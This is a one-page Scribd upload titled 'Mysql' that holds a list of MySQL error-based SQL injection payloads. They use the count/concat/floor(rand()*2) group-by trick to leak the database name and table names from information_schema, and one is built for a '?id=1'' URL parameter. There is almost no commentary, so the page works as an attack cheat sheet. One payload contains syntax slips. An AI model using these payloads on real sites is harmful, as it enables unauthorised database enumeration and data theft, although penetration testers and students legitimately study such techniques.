0% found this document useful (0 votes)
21 views1 page

Mysql

The document contains SQL queries attempting to extract metadata and table names from database tables for the purpose of reconnaissance or exploitation.

Uploaded by

wavejab
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
21 views1 page

Mysql

The document contains SQL queries attempting to extract metadata and table names from database tables for the purpose of reconnaissance or exploitation.

Uploaded by

wavejab
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

?

id=1' and select count(*), concat(0x3a,0x3a,(select table_name from


information_schema.tables where table_schema=databases()),0x3a,0x3a,
floor(rand()*2))a from information_schema.tables group by a; --+

select concat(0x3a,database(),0x3a,floor(rand()*2))z;

select count(*),concat(0x3a,database(),0x3a,floor(rand()*2))z from


information_schema.tables;

select count(*),concat(0x3a,(select table_name from information_schema.tables


where table_schema=database()),0x3a,floor(rand()*2))z from
information_schema.tables group by z;

select count(*),concat(0x3a,database(),0x3a,floor(rand()*2))z from


information_schema.tables group by z;

table_name from information_schema.tables where table_schema=database()

(select count(*),concat(0x3a,(select table_name from information_schema.tables


where table_schema=database()),0x3a,floor(rand()*2))z from
information_schema.tables group by z)

(select 1 from(select count(*),concat(0x3a,0x3a,(select table_name from


information_schema.tables where table_schema=database()),0x3a,0x3a,
floor(rand()*2))z from information_schema.tables group by z)u)

You might also like